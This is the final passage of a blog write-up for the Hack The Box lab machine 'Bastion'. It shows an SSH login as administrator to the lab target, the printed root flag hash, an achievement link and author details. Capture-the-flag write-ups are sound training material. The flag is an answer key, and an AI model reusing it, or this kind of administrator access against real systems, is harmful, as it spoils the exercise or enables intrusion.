┌──(kali㉿offsec)-[~/Desktop]
└─$ ssh administrator@10.10.10.134
administrator@10.10.10.134's password: 

Microsoft Windows [Version 10.0.14393]                                                                         
(c) 2016 Microsoft Corporation. All rights reserved.                                                           

administrator@BASTION C:\Users\Administrator>cd Desktop                                                        

administrator@BASTION C:\Users\Administrator\Desktop>type root.txt                                             
ba913835dc8f4a6af5ade06fd923fe41                                                                               

administrator@BASTION C:\Users\Administrator\Desktop>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/186

打靶记
#shooting-range
Bastion-htb-writeup
https://sh1yan.top/2024/03/15/Bastion-htb-writeup/
作者
shiyan
发布于
2024年3月15日
许可协议